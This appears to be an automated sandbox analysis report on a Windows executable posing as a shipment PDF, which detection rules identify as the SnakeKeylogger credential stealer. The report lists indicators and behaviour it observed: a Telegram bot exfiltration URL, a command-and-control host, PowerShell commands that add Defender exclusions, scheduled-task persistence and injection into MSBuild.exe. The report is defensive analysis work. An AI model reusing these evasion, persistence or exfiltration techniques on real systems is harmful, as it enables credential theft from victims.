                  Source: MSBuild.exe, 00000009.00000002.3578857774.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003274000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://kashmirestore.com
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2421064302.00000000032F7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, FZcXKpA.exe, 0000000A.00000002.2539468876.0000000003317000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Shipment 990847575203.pdf.exe, FZcXKpA.exe.0.dr; String found in binary or memory: http://tempuri.org/kviskotekaDbDataSet.xsdcIgra
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://varders.kozow.com:8081
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot
                  Source: MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20a
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: MSBuild.exe, 00000011.00000002.3578489712.0000000003218000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003209000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: MSBuild.exe, 00000011.00000002.3578489712.0000000003209000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://chrome.google.com/webstore?hl=en8
                  Source: MSBuild.exe, 00000011.00000002.3578489712.0000000003213000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: MSBuild.exe, 00000009.00000002.3578857774.0000000002992000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003141000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: MSBuild.exe, 00000011.00000002.3578489712.0000000003141000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: MSBuild.exe, 00000009.00000002.3578857774.000000000294D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002992000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003141000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.ecosia.org/newtab/
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: MSBuild.exe, 00000011.00000002.3578489712.000000000324A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.office.com/
                  Source: MSBuild.exe, 00000009.00000002.3578857774.0000000002A95000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.office.com/lB
                  Source: MSBuild.exe, 00000009.00000002.3578857774.0000000002A8B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.office.com/p
                  Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49712 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49755 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49768 version: TLS 1.2

                  System Summary

                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Shipment 990847575203.pdf.exe PID: 5192, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: initial sampleStatic PE information: Filename: Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: FZcXKpA.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2438850079.0000000007B70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2419769036.000000000157E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2421064302.000000000330C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2421064302.00000000032F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000000.2323378587.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHQOL.exe4 vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2440674373.0000000008050000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exeBinary or memory string: OriginalFilenameHQOL.exe4 vs Shipment 990847575203.pdf.exe
                  Source: Shipment 990847575203.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 17.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Shipment 990847575203.pdf.exe PID: 5192, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Shipment 990847575203.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: FZcXKpA.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, jynCmXCF47q9Whp0rl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, jynCmXCF47q9Whp0rl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, jQtbrjIkx2d5oocfLW.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, jQtbrjIkx2d5oocfLW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, jQtbrjIkx2d5oocfLW.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, jQtbrjIkx2d5oocfLW.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, jQtbrjIkx2d5oocfLW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, jQtbrjIkx2d5oocfLW.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@6/6
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe File created: C:\Users\user\AppData\Roaming\FZcXKpA.exe
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_03
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe File created: C:\Users\user\AppData\Local\Temp\tmp56D.tmp
                  Source: Shipment 990847575203.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: MSBuild.exe, 00000009.00000002.3578857774.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002B84000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003308000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.000000000332E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.000000000333A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Shipment 990847575203.pdf.exeReversingLabs: Detection: 65%
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe File read: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe
                  Source: unknownProcess created: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe"
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FZcXKpA.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\FZcXKpA.exe C:\Users\user\AppData\Roaming\FZcXKpA.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Shipment 990847575203.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Shipment 990847575203.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  Source: 0.2.Shipment 990847575203.pdf.exe.4537a70.1.raw.unpack, jQtbrjIkx2d5oocfLW.cs .Net Code: phSsPsqGmA System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Shipment 990847575203.pdf.exe.7b70000.3.raw.unpack, L2.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Shipment 990847575203.pdf.exe.8050000.4.raw.unpack, jQtbrjIkx2d5oocfLW.cs .Net Code: phSsPsqGmA System.Reflection.Assembly.Load(byte[])
